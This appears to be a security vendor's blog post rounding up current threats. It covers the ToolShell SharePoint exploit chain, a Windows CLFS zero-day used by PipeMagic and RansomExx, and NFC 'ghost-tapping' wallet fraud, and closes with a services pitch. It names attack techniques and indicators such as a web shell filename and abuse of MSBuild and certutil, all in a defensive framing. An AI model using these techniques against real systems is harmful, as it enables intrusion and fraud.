Staying ahead of rapidly evolving threats requires consistent, actionable cyber threat intelligence. In this week’s roundup, we’re tracking three major attack vectors with growing implications for U.S.-based organizations: a critical SharePoint exploit chain now weaponized for ransomware, a stealthy Windows zero-day enabling RansomExx payloads, and a fast-spreading NFC fraud campaign draining mobile wallets through ghost-tapping techniques.
Let’s break down each threat—and what your security teams need to do next.
ToolShell Exploits in SharePoint Deliver Ransomware at Scale
In this week’s cyber threat intelligence update, SharePoint servers face an alarming wave of exploitation. The ToolShell exploit chain—leveraging CVE‑2025‑53770 and its sibling CVE‑2025‑53771—allows unauthenticated attackers to execute arbitrary code on on-premises SharePoint Server installations, including 2016, 2019, and Subscription Edition. These flaws enable attackers to bypass even robust protections like MFA or single-sign-on by manipulating insecure deserialization or spoofing mechanisms.
Security researchers have confirmed that this zero-day chain has already impacted hundreds of servers globally, with at least 400 victims—including U.S. federal institutions such as NIH and DHS—and suspicion of broader exposure spanning financial, healthcare, and energy sectors. In particular, ransomware families like Warlock and 4L4MD4R have been observed leveraging ToolShell to deploy payloads post-exploitation.
U.S. cybersecurity authorities, including CISA, have responded by listing CVE‑2025‑53770 in its Known Exploited Vulnerabilities Catalog, demanding immediate remediation across federal agencies. Recommended mitigations include urgent patching, rotation of MachineKey material after patching, enabling Defender AMSI integration, isolating exposed hosts, and intensive threat hunting for web shells like spinstall0.aspx. Analysts warn that failure to act immediately risks continued threat persistence and lateral movement within critical networks.
Windows CLFS Zero‑Day Enables PipeMagic and RansomExx Attacks
Another pressing concern in this week’s cyber threat intelligence report is CVE‑2025‑29824, a Windows kernel privilege escalation flaw impacting the Common Log File System (CLFS). Microsoft confirmed active exploitation by the threat group Storm‑2460, which uses modular malware called PipeMagic to take advantage of this vulnerability. Once executed, PipeMagic elevates privileges to SYSTEM, facilitating credential theft (e.g., LSASS dumping) and ransomware payload deployment.
Notably, the malware frequently relies on living-off-the-land binaries, such as MSBuild or certutil, for stealthy loading, and uses named pipes for command and control communication. Some attack variants even load payloads from Azure-hosted domains via decompression of C# metascripts like metafile.mshi. Affected industries range across IT, real estate, financial services, retail, and include victims in the U.S., Saudi Arabia, Spain, and Venezuela.
Even patched environments remain at risk if incidents occurred prior to the April patch. Behavioral monitoring is critical—security teams should flag anomalous kernel activity, MSBuild executions, certutil abuse, or suspicious named-pipe creation. Leveraging Microsoft Defender XDR or similar EDR tools to detect token manipulation via RtlSetAllBits API or elevated privilege artifacts can greatly reduce dwell time.
Ghost‑Tapping: Mobile Wallet Fraud Goes Physical
The latest cyber threat intelligence spotlight also highlights a growing NFC fraud method known as ghost-tapping: malicious actors are relaying stolen payment credentials via mobile wallets like Apple Pay and Google Pay using NFC relay tools (like NFCGate) to execute in-person fraudulent transactions at POS systems.
ThreatFabric and Recorded Future researchers have exposed syndicates, often Chinese-speaking, who advertise ghost-tapping services via Telegram. These groups use farms of Android devices to relay card data to payment terminals in real time. This enables large-scale, anonymous retail fraud. While many early cases appeared in Southeast Asia, the trend is highly relevant to the U.S. Mobile wallet usage is widespread, making American consumers and businesses potential targets. Financial institutions, retail chains, and payment processors must adapt rapidly to these evolving threats.
Effective detection strategies include real-time transaction analytics to flag impossible device pairings and unusual tap behaviors. They also detect new enrollments of mobile wallet credentials. Behavioral and device metadata, combined with adaptive rules, help block suspicious NFC activity. These measures are critical for rapid fraud detection and preventing financial loss.
Modern Threats: Cyber Intelligence in Action
Taken together, these three threat vectors show the complex nature of modern cyber threats. They range from remote code execution in critical platforms to stealthy privilege escalation and hands-on fraud. In response, current cyber threat intelligence helps security teams act fast. It empowers them to prioritize patching, sharpen detection logic, and strengthen prevention across systems and user touchpoints.
That’s why RSI Security turns threat intelligence into defensible action steps. This includes proactive assessments and endpoint behavioral monitoring. We also deliver mobile security enhancements tailored to today’s evolving digital risks.
Ready to fortify your cyber threat defenses?
Explore our Cybersecurity Services or connect with our team for a threat intelligence consultation: